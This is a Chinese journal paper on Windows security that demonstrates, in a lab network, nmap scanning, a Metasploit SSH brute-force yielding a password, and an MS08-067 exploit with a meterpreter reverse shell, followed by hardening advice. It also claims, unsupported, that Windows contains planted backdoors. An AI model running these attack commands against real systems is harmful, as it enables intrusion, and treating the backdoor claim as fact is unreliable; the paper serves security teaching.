王國(guó)柱
摘? 要: 為了檢驗(yàn)Windows操作系統(tǒng)的安全性,從商業(yè)和技術(shù)兩個(gè)角度剖析。從其開(kāi)發(fā)的商業(yè)目的分析,得出了追求市場(chǎng)占有率與利潤(rùn),是Windows操作系統(tǒng)的首選,而安全性不是此款操作系統(tǒng)的迫切追求;從技術(shù)角度對(duì)Windows操作系統(tǒng)進(jìn)行攻擊,驗(yàn)證了其確實(shí)存在安全隱患。作者利用Kali Linux攻擊平臺(tái),對(duì)Windows系統(tǒng)依次進(jìn)行掃描、滲透、提權(quán)以及終極后續(xù)操作,可以成功滲透并能遠(yuǎn)程控制Windows 系統(tǒng)為攻擊者服務(wù)。
關(guān)鍵詞: Windows操作系統(tǒng); 安全性; 滲透; 提權(quán); 遠(yuǎn)程控制
中圖分類(lèi)號(hào):TP393.08? ? ? ? ? 文獻(xiàn)標(biāo)識(shí)碼:A? ? ?文章編號(hào):1006-8228(2022)04-29-05
Research on the security of windows system
Wang Guozhu
(Computer Network Technology Teaching and Research Office of Zhengzhou National Defense Science and Technology School,
Zhengzhou, Henan 450007, China)
Abstract: In order to examine the security of the Windows operating system, it is analyzed from business and technology. From business, it is concluded that the pursuit of market share and profit is the first choice and security is not the urgent pursuit of Windows operating system; from technology, the attack on the Windows operating system has verified that it does have security risks. Using the Kali Linux attack platform to scan, infiltrate, elevate privileges and finally follow-up operations on the Windows system in sequence, it can successfully infiltrate and remotely control the Windows system to serve the attacker.
Key words: windows operating system; security; infiltrate; elevate privileges; remote control
0 引言
Windows操作系統(tǒng)是美國(guó)微軟公司研發(fā)的一款商業(yè)操作系統(tǒng)軟件,現(xiàn)已成為應(yīng)用最廣泛的計(jì)算機(jī)桌面操作系統(tǒng),它基本壟斷著全球的計(jì)算機(jī)操作系統(tǒng)市場(chǎng)。
但是,它又是一款漏洞百出并且預(yù)留有后門(mén)的操作系統(tǒng),因此Windows操作系統(tǒng)常常會(huì)遭到大量的網(wǎng)絡(luò)攻擊,最終讓用戶的合法利益蒙受損失。為此,本文著重從專(zhuān)業(yè)技術(shù)方面,利用Kali Linux滲透平臺(tái),采用攻擊實(shí)操的方式,對(duì)Windows操作系統(tǒng)進(jìn)行安全測(cè)試,借此向廣大Windows用戶展示此款操作系統(tǒng)存在的部分不安全因素,意在喚醒國(guó)人的安全意識(shí),謹(jǐn)慎使用Windows操作系統(tǒng),并做好有針對(duì)性的安全防范,以便把風(fēng)險(xiǎn)降至最底點(diǎn)。
1 兩種操作系統(tǒng)
1.1 Windows操作系統(tǒng)
Windows操作系統(tǒng)是美國(guó)微軟公司研發(fā)的一款商業(yè)操作系統(tǒng)軟件,它采用了圖形化模式,使用界面友好,窗口制作優(yōu)美,易學(xué)易用 [1]。同時(shí),它還擁有完善的生態(tài)環(huán)境,提供大量的應(yīng)用軟件給客戶選擇使用。這些應(yīng)用軟件門(mén)類(lèi)全,功能完善,為用戶提供了良好的體驗(yàn)性和實(shí)用性。因此,Windows操作系統(tǒng)已成為目前應(yīng)用最廣泛的計(jì)算機(jī)桌面操作系統(tǒng)。
1.2 Kali Linux操作系統(tǒng)
Kali Linux是一款免費(fèi)的、基于Debian的Linux發(fā)行版系統(tǒng)軟件,同時(shí),它也是一款專(zhuān)注于滲透測(cè)試的操作系統(tǒng)[5]。
Kali Linux預(yù)裝了超過(guò)300個(gè)滲透測(cè)試工具軟件,包括nmap、Wireshark、John the Ripper等等。
2 Windows操作系統(tǒng)確實(shí)存在不安全性
2.1 從商業(yè)的角度來(lái)分析
因?yàn)镸icrosoft Windows是款商業(yè)軟件,商業(yè)是要追逐利潤(rùn)的,而且還要最大化。所以,它的最高追求不是高可靠性和高安全性,而是易用性和功能性。這樣才能受到普通企業(yè)和一般民眾的普遍歡迎,從而購(gòu)買(mǎi)使用,這樣就能得到更大的市場(chǎng)占有率,最終獲得最大的利潤(rùn)。
2.2 從技術(shù)的角度來(lái)分析
接下來(lái),本文利用實(shí)驗(yàn)操作的方式,來(lái)證明Windows操作系統(tǒng)的不安全性。同時(shí)聲明:本文中所有的實(shí)驗(yàn)操作都是在局域網(wǎng)環(huán)境內(nèi)進(jìn)行的,攻擊機(jī)操作系統(tǒng)都是Kali Linux,靶機(jī)操作系統(tǒng)則是相應(yīng)的Windows操作系統(tǒng)。
2.2.1 如何發(fā)現(xiàn)Windows的不安全因素
利用掃描工具軟件(這類(lèi)工具軟件都是集成在Kali Linux系統(tǒng)中的)掃描靶機(jī)的Windows操作系統(tǒng),就能夠發(fā)現(xiàn)它存在哪些不安全性因素,利用這些不安全因素就可以對(duì)系統(tǒng)發(fā)起攻擊了[3]。40C76890-AA4A-4E25-83E2-8E57BD8B7F75
接下來(lái),本文使用Nmap掃描工具軟件,來(lái)展示如何對(duì)目標(biāo)靶機(jī)進(jìn)行掃描操作:
⑴ 掃描網(wǎng)絡(luò)網(wǎng)段內(nèi)的主機(jī),發(fā)現(xiàn)網(wǎng)段里存活的靶機(jī),并輸出存活靶機(jī)的詳細(xì)信息。
例如,掃描指定的網(wǎng)段192.168.119.0/24內(nèi)的主機(jī)??梢栽诠魴C(jī)上運(yùn)行這樣的命令行:nmap -sn? 192.168.119.0/24,如果在運(yùn)行結(jié)果中出現(xiàn)“Host is up”這樣的語(yǔ)句,則表明所掃描的網(wǎng)段內(nèi)有存活的靶機(jī),并且還顯示了該靶機(jī)的MAC Address(物理地址),如圖1所示。
⑵ 掃描目標(biāo)靶機(jī)的端口
掃描到存活的靶機(jī)之后,就可以對(duì)這個(gè)目標(biāo)靶機(jī)單獨(dú)發(fā)起掃描,來(lái)查看它開(kāi)放了哪些端口。
例如:掃描目標(biāo)靶機(jī)192.168.119.7開(kāi)放的端口,在攻擊機(jī)上運(yùn)行命令行:nmap -ss 192.168.119.7,就會(huì)在掃描結(jié)果中出現(xiàn)一行“PORT STATE? SERVICE”提示語(yǔ)句。在其下面各行中,如果出現(xiàn)“open”單詞,則表明靶機(jī)系統(tǒng)有開(kāi)放端口,open前面是端口名稱(chēng),后面是端口服務(wù)名稱(chēng)。如圖2所示。
⑶ 識(shí)別目標(biāo)靶機(jī)端口上對(duì)應(yīng)的服務(wù)
下面以靶機(jī)(192.168.119.7)為例,在掃描到該目標(biāo)靶機(jī)所開(kāi)放的端口之后,再對(duì)這些端口所對(duì)應(yīng)的服務(wù)進(jìn)行識(shí)別。
在攻擊機(jī)上運(yùn)行命令行:nmap -sV -T4 -p? 135,445,22, 139 192.168.119.7,掃描結(jié)果顯示22端口對(duì)應(yīng)的服務(wù)是SSH,如圖3所示。
⑷ 探測(cè)目標(biāo)靶機(jī)的操作系統(tǒng)
此處以目標(biāo)靶機(jī)(192.168.119.7)為例,來(lái)探測(cè)靶機(jī)所運(yùn)行的操作系統(tǒng)類(lèi)型。
在攻擊機(jī)上運(yùn)行命令行:nmap -O 192.168.119.7,在運(yùn)行結(jié)果中顯示出“OS details”語(yǔ)句,其后面就是靶機(jī)操作系統(tǒng)的詳細(xì)信息。如圖4所示。
2.2.2 如何利用Windows系統(tǒng)不安全因素發(fā)起攻擊
下面所有的攻擊操作都是在Kali Linux系統(tǒng)中的MSF控制臺(tái)上完成的。
MSF(Metasploit Framework的縮寫(xiě))是一個(gè)編寫(xiě)、測(cè)試和使用exploit代碼的完善環(huán)境。這個(gè)環(huán)境為滲透測(cè)試、Shellcode編寫(xiě)和漏洞研究提供了一個(gè)可靠的平臺(tái)[5]。
⑴ 進(jìn)入Kali Linux系統(tǒng)中MSF控制臺(tái)
在攻擊機(jī)上運(yùn)行命令msfconsole,就能進(jìn)入msf控制臺(tái)了。
注意:如果首次使用msfconsole,需要先把系統(tǒng)內(nèi)置的數(shù)據(jù)庫(kù)PostgreSQL和metasplote開(kāi)啟,然后才能再運(yùn)行msfconsole,操作步驟如下。
① 開(kāi)啟PostgreSQL
在攻擊機(jī)Kali Linux系統(tǒng)命令行狀態(tài)下輸入命令:
service postgresql start
② 開(kāi)啟metasploit
在攻擊機(jī)Kali Linux系統(tǒng)命令行狀態(tài)下輸入命令:
service metasploit start
③ 最后是運(yùn)行msfconsole
⑵ 暴力破解實(shí)驗(yàn)
暴力破解實(shí)際上也就是給出一個(gè)含有一堆字符串的文本,然后,使用爆破工具軟件逐個(gè)嘗試文本中的字符串作為密碼登錄[3]。因此,暴力破解需要借助密碼字典來(lái)破解密碼。
密碼字典可以自己來(lái)編寫(xiě),也就是把所有可能的用戶及其密碼全部寫(xiě)出來(lái),并保存成文本文件來(lái)做為破解字典用。
密碼字典也可以使用Kali Linux系統(tǒng)下的字典生成工具來(lái)生成。例如使用Cewl字典生成工具軟件來(lái)獲得字典,并能將獲得的字典內(nèi)容放到自定義的一個(gè)文本文件中,以備使用。
下面的破解過(guò)程所用到的破解字典是操作者自己手動(dòng)編寫(xiě)的兩個(gè)文本文件:user.txt和pass.txt。
破解實(shí)例:實(shí)驗(yàn)使用的攻擊機(jī)是Kali Linux,靶機(jī)是192.168.119.7。
破解目的:在MSF環(huán)境中爆力破解192.168.119.7這臺(tái)靶機(jī)的ssh服務(wù) ,并實(shí)現(xiàn)遠(yuǎn)程登錄這臺(tái)靶機(jī)。
破解實(shí)施主要命令:
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set pass_file /root/pass
set rhosts 192.168.119.7
set user_file /root/user
run
ssh? togie @192.168.119.7
接下來(lái)使用Kali Linux系統(tǒng),在MSF環(huán)境中爆力破解192.168.119.7靶機(jī)的ssh服務(wù),并實(shí)現(xiàn)遠(yuǎn)程登錄這臺(tái)靶機(jī)。
破解實(shí)施操作過(guò)程如下。
第一步:搜索ssh暴力破解模塊
在攻擊機(jī)的MSF平臺(tái)上輸入執(zhí)行命令search? ssh_login ,如果運(yùn)行結(jié)果中出現(xiàn)“auxiliary/scanner/ssh/ ssh_login”? 語(yǔ)句,那么,就可以接著進(jìn)行第二步操作了。
第二步: 使用msf的“auxiliary/scanner/ssh/ssh_login”模塊
在攻擊機(jī)的MSF平臺(tái)上輸入命令:
use auxiliary/scanner/ssh/ssh_login
第三步:設(shè)置相關(guān)參數(shù)
在攻擊機(jī)的MSF平臺(tái)上依次輸入執(zhí)行下列命令行:40C76890-AA4A-4E25-83E2-8E57BD8B7F75
set pass_file/root/pass.txt
set rhosts? 192.168.119.7
set use_file? root/user.txt
第四步:查看設(shè)置的相關(guān)參數(shù)
在攻擊機(jī)的MSF平臺(tái)上輸入執(zhí)行命令:show options,在運(yùn)行結(jié)果中,重點(diǎn)要查看“PASS_FILE、RHOSTS、RPORT、USER_FILE”這四項(xiàng)的參數(shù)值是否正確,如圖5所示即可。
第五步:開(kāi)始爆破
在攻擊機(jī)的MSF平臺(tái)上輸入執(zhí)行命令:run ,在運(yùn)行結(jié)果中,如果出現(xiàn)“success”,則表明已成功爆破出了靶機(jī)系統(tǒng)中的某個(gè)用戶名及其登錄密碼了。
如圖6所示,已經(jīng)成功爆破出靶機(jī)(192.168.119.7)系統(tǒng)中的用戶名togie及其登錄密碼:12345。
第六步: 遠(yuǎn)程登錄這臺(tái)靶機(jī)
在攻擊機(jī)的Kali Linux系統(tǒng)命令行狀態(tài)(注意:此時(shí)不要在MSF環(huán)境中,輸入執(zhí)行命令)輸入執(zhí)行命令行:ssh? togie @192.168.119.7 ,然后按系統(tǒng)提示,輸入用戶密碼12345之后,就可以遠(yuǎn)程登錄這臺(tái)靶機(jī)了,登錄成功后,攻擊者就可以遠(yuǎn)程使用該靶機(jī),就像使用自己的本地機(jī)一樣。
⑶ 系統(tǒng)漏洞攻擊實(shí)驗(yàn)
系統(tǒng)漏洞攻擊是指應(yīng)用軟件或操作系統(tǒng)軟件在邏輯設(shè)計(jì)上的缺陷或錯(cuò)誤,被不法者利用,通過(guò)網(wǎng)絡(luò)植入木馬、病毒等方式來(lái)攻擊或控制整個(gè)電腦,竊取電腦中的重要資料和信息,甚至破壞系統(tǒng)[3]。
漏洞攻擊實(shí)例 利用Win2000 Server系統(tǒng)的MS08-067漏洞對(duì)其發(fā)起攻擊,實(shí)驗(yàn)使用的攻擊機(jī)是Kali Linux,靶機(jī)是Win2000 Server。
MS08-067漏洞是通過(guò)MSRPC over SMB通道調(diào)用Server服務(wù)程序中的NetPathCanonicalize函數(shù)時(shí)觸發(fā)的。NetPathCanonicalize函數(shù)在遠(yuǎn)程訪問(wèn)其他主機(jī)時(shí),會(huì)調(diào)用NetpwPathCanonicalize函數(shù),對(duì)遠(yuǎn)程訪問(wèn)的路徑進(jìn)行規(guī)范化。但是,在NetpwPathCanonicalize函數(shù)中存在的邏輯錯(cuò)誤,會(huì)造成棧緩沖區(qū)可被溢出。因此,攻擊者常常會(huì)借此來(lái)獲得遠(yuǎn)程執(zhí)行代碼權(quán)限(Remote Code Execution)。
實(shí)驗(yàn)攻擊的目的 利用Win2000 Server系統(tǒng)的MS08-067漏洞,在攻擊機(jī)上執(zhí)行payload載荷拿到靶機(jī)shell權(quán)限,然后,獲得目標(biāo)系統(tǒng)的屏幕截圖。
實(shí)驗(yàn)攻擊所使用的主要命令
use exploit/Windows/smb/ms08_067_netapi
set rhosts? 192.168.11.40
set payload Windows/meterpreter/reverse_tcp
set lhost? 192.168.11.35
exploit
screenshot
實(shí)驗(yàn)攻擊的操作過(guò)程
第一步:查看攻擊機(jī)ip地址
在攻擊機(jī)上運(yùn)行命令 ifconfig,就可以查看到攻擊機(jī)的IP地址、子網(wǎng)掩碼及廣播地址。本次實(shí)驗(yàn)中攻擊機(jī)的相關(guān)地址是:
IP地址:192.168.11.35
子網(wǎng)掩碼:255.255.255.0
廣播地址:192.168.11.255
第二步:查看靶機(jī)ip地址
在靶機(jī)上運(yùn)行命令 iPconfig,就可以查看到靶機(jī)的IP地址、子網(wǎng)掩碼及廣播地址,本次實(shí)驗(yàn)中靶機(jī)的相關(guān)地址是:
IP地址:192.168.11.40
子網(wǎng)掩碼:255.255.255.0
默認(rèn)網(wǎng)關(guān):192.168.11.11
第三步:在Kali中使用metasploit
在攻擊機(jī)中啟動(dòng)PostgreSQL數(shù)據(jù)庫(kù)服務(wù)和metasploit服務(wù),需在攻擊機(jī)上執(zhí)行下面兩條命令:
service? postgresql? start
service? metasploit? start(這條命令可在低版本的
Kali Linux中運(yùn)行,如果是攻擊機(jī)是高版本的Kali Linux,
需執(zhí)行下面操作命令)
第四步: 由于高版本Kali Linux中已經(jīng)沒(méi)有metasploit,所以,在高版本的Kali Linux中必須運(yùn)行下面的幾個(gè)命令實(shí)現(xiàn)連接數(shù)據(jù)庫(kù)服務(wù)。
在攻擊機(jī)中運(yùn)行:
service? postgresql? start
msfdb init
然后,在攻擊機(jī)上執(zhí)行下面命令可以查看數(shù)據(jù)庫(kù)是否連接成功。
Msfconsole
Dbstatus
如果在執(zhí)行結(jié)果中出現(xiàn)“PostgreSQL connected to msf”提示語(yǔ)句,說(shuō)明數(shù)據(jù)庫(kù)連接成功。
第五步:查找是否存在ms08-067漏洞功能模塊
在攻擊機(jī)中輸入命令行Search? ms08-067 運(yùn)行,如果在運(yùn)行結(jié)果信息中,出現(xiàn)“exploit/Windows/smb/ms08_067_ netapi”語(yǔ)句,表明存在該功能模塊。
第六步:輸入漏洞攻擊程序
在攻擊機(jī)中執(zhí)行下面命令行:
use exploit/Windows/smb/ms08_067_netapi40C76890-AA4A-4E25-83E2-8E57BD8B7F75
第七步:設(shè)置靶機(jī)和攻擊機(jī)的地址
在攻擊機(jī)中依次輸入并運(yùn)行下面兩個(gè)命令行:
Set? RHOST 192.168.11.40
Set? LHOST 192.168.11.35
說(shuō)明:192.168.11.40是靶機(jī)地址,192.168.11.35是攻擊機(jī)地址,在前面已經(jīng)提前查看到的。
第八步:提權(quán)
在攻擊機(jī)中執(zhí)行命令exploit,拿到靶機(jī)shell權(quán)限。
第九步:小試牛刀
在攻擊機(jī)上,遠(yuǎn)程獲得靶機(jī)系統(tǒng)的屏幕截圖(當(dāng)然,還可以遠(yuǎn)程控制靶機(jī)后,對(duì)靶機(jī)進(jìn)行其他操作,就像操作本地計(jì)算機(jī)一樣)。
在攻擊機(jī)中輸入執(zhí)行命令:screenshot
在運(yùn)行結(jié)果中就會(huì)出現(xiàn)“Screenshot saved to: /root/fXFYFMJk. Jpeg”反饋信息。表明靶機(jī)系統(tǒng)桌面的截圖文件fXFYFMJk. Jpeg,已被攻擊機(jī)自動(dòng)地放在Kali Linux系統(tǒng)的root路徑中了。
3 如何防范Windows不安全因素
3.1 加強(qiáng)Windows用戶賬戶認(rèn)證和訪問(wèn)控制權(quán)限控制
Windows用戶賬號(hào)可以確認(rèn)訪問(wèn)系統(tǒng)資源的用戶身份,是用戶獲得系統(tǒng)訪問(wèn)權(quán)限的關(guān)鍵。當(dāng)前Windows系統(tǒng)中身份認(rèn)證通常采用賬號(hào)和密碼認(rèn)證的方式進(jìn)行。因此,用戶賬號(hào)和密碼的安全設(shè)置非常重要。
例如,在Windows系統(tǒng)中可以在“控制面板”打開(kāi)“管理工具”中的“本地安全策略”,找到“賬戶策略”中的“密碼策略”和“賬戶鎖定策略”進(jìn)行安全設(shè)置[4]。
從賬號(hào)安全角度考慮,賬號(hào)密碼要有一定的復(fù)雜度和長(zhǎng)度要求,可以開(kāi)啟“密碼必須符合復(fù)雜性要求”,設(shè)置“密碼長(zhǎng)度最小值”在8位以上。
另外,選中“賬戶鎖定策略”,根據(jù)安全策略設(shè)置“賬戶鎖定閾值”和“賬戶鎖定時(shí)間”。這樣,當(dāng)用戶賬戶無(wú)效登陸次數(shù)超過(guò)指定閾值時(shí),該用戶將在設(shè)置的鎖定時(shí)間內(nèi)無(wú)法登錄系統(tǒng)。
3.2 進(jìn)行Windows系統(tǒng)備份
通過(guò)Windows控制面板中“備份和還原”可以保護(hù)系統(tǒng)由于病毒或黑客攻擊等原因而無(wú)法正常、穩(wěn)定的運(yùn)行,避免由于系統(tǒng)意外的損失造成數(shù)據(jù)丟失或破壞。
在系統(tǒng)備份時(shí),建議在系統(tǒng)功能正常,同時(shí)安裝了常用的應(yīng)用軟件,并且,確保沒(méi)有病毒或木馬的情況下進(jìn)行備份[2]。
3.3 使用WindowsBitLocker進(jìn)行驅(qū)動(dòng)器加密
可以在“我的電腦”中右鍵單擊需要加密的硬盤(pán)分區(qū),選擇“啟用BitLocker”功能,根據(jù)BitLocker加密向?qū)нM(jìn)行操作。
BitLocker加密功能對(duì)U盤(pán)等可移動(dòng)存儲(chǔ)設(shè)置有效,只要啟用BitLocker功能就可以對(duì)移動(dòng)硬盤(pán)等設(shè)備進(jìn)行加密,避免由于這些移動(dòng)設(shè)備丟失造成的隱私信息外泄等情形發(fā)生[2]。
3.4 開(kāi)啟Windows防火墻
防火墻作為實(shí)現(xiàn)網(wǎng)絡(luò)安全的重要技術(shù),通常位于網(wǎng)絡(luò)邊界,在防火墻上設(shè)置規(guī)則可以將未符合防火墻安全策略設(shè)置的數(shù)據(jù)攔截在外,這樣可以在很大程度上防御來(lái)自外界的攻擊[4]。
在Windows防火墻中可以通過(guò)設(shè)置“入站規(guī)則”、“出站規(guī)則”、“連接安全規(guī)則”和“監(jiān)視”等進(jìn)行數(shù)據(jù)過(guò)濾。但是,一旦防火墻設(shè)置不當(dāng)不僅阻攔不了惡意用戶攻擊系統(tǒng),反而會(huì)造成合法用戶不能正常訪問(wèn)互聯(lián)網(wǎng)的情況出現(xiàn)。因此,防火墻規(guī)則設(shè)置一定要經(jīng)過(guò)測(cè)試,定期進(jìn)行后期維護(hù)。
3.5 及時(shí)安裝系統(tǒng)漏洞補(bǔ)丁
Windows系統(tǒng)是一個(gè)非常復(fù)雜的軟件系統(tǒng),會(huì)或多或少存在漏洞,也就是操作系統(tǒng)在開(kāi)發(fā)過(guò)程中存在的技術(shù)缺陷,導(dǎo)致系統(tǒng)運(yùn)行過(guò)程中出現(xiàn)某些妨礙用戶使用的錯(cuò)誤,這些缺陷還容易被黑客利用,用于攻擊計(jì)算機(jī)或竊取數(shù)據(jù)[2]。
剛裝好系統(tǒng)的時(shí)候,默認(rèn)是沒(méi)有安裝過(guò)系統(tǒng)漏洞補(bǔ)丁的。因此,需要用戶安裝各種漏洞補(bǔ)丁程序。目前,安裝系統(tǒng)漏洞補(bǔ)丁有兩種方法:
第一種方法是使用各種輔助軟件給系統(tǒng)安裝補(bǔ)丁程序,這種方法經(jīng)常會(huì)出現(xiàn)開(kāi)機(jī)藍(lán)屏、配置Windows Update失敗或者長(zhǎng)時(shí)間一直卡住無(wú)法完成配置的情況。
第二種方法是使用用系統(tǒng)自帶的Windows Update功能來(lái)安裝系統(tǒng)補(bǔ)丁程序,比較穩(wěn)妥。用戶可以根據(jù)個(gè)人的系統(tǒng)情況自行選擇。
3.6 及時(shí)安裝殺毒軟件
在目前的互聯(lián)網(wǎng)環(huán)境下,Windows系統(tǒng)更多的是受到流氓軟件,彈窗、捆綁、靜默安裝、后門(mén)、木馬等的侵害,而Windows系統(tǒng)自帶的安全防護(hù)功能還不能完全防范。因此,需要安裝一款本地殺毒軟件有針對(duì)性地進(jìn)行防護(hù)。
4 結(jié)束語(yǔ)
本文從商業(yè)和技術(shù)的角度對(duì)Windows系統(tǒng)的安全性進(jìn)行探討和驗(yàn)證,有力地證明了這款操作系統(tǒng)的安全性令人堪憂,可以說(shuō),Windows是一款不安全的操作系統(tǒng),用戶在使用此款操作系統(tǒng)時(shí),一定要做好必要的安全防范,從而才能保障個(gè)人信息的安全。
此外,沿用本文的思路,也可以用類(lèi)似的方法來(lái)探討和驗(yàn)證其他操作系統(tǒng)(例如,安卓操作系統(tǒng))的安全性。以此來(lái)提醒廣大用戶,在使用操作系統(tǒng)的過(guò)程中,要有安全防范意識(shí)和行之有效的安全措施。
本文僅僅是在局域網(wǎng)環(huán)境下對(duì)Windows系統(tǒng)的安全性進(jìn)行了一番探討和驗(yàn)證,而基于互聯(lián)網(wǎng)環(huán)境下的檢測(cè)與攻擊還沒(méi)有涉及到,因此,下一步,在互聯(lián)網(wǎng)環(huán)境下,此款操作系統(tǒng)的安全性驗(yàn)證以及攻擊者所采用的攻擊方法,將是作者要進(jìn)一步探索的方向。同時(shí),有針對(duì)性地加強(qiáng)Windows安全性的措施及方法,也將是作者努力研究的方向。
參考文獻(xiàn)(References):
[1] 韓兵,李海坤.淺談Windows操作系統(tǒng)[J].數(shù)碼世界,2017(6):10
[2] 陳洪艷.Windows操作系統(tǒng)的安全[J].電腦編程技巧與維護(hù),2011(20):6
[3] 楊誠(chéng).網(wǎng)絡(luò)空間安全技術(shù)應(yīng)用[M].北京:電子工業(yè)出版社,2018.2
[4] 何琳.Windows操作系統(tǒng)安全配置[M].北京:電子工業(yè)出版社,2020.8
[5] 楊波.Kali Linux滲透測(cè)試技術(shù)詳解[M].北京:清華大學(xué)出版社,2015.340C76890-AA4A-4E25-83E2-8E57BD8B7F75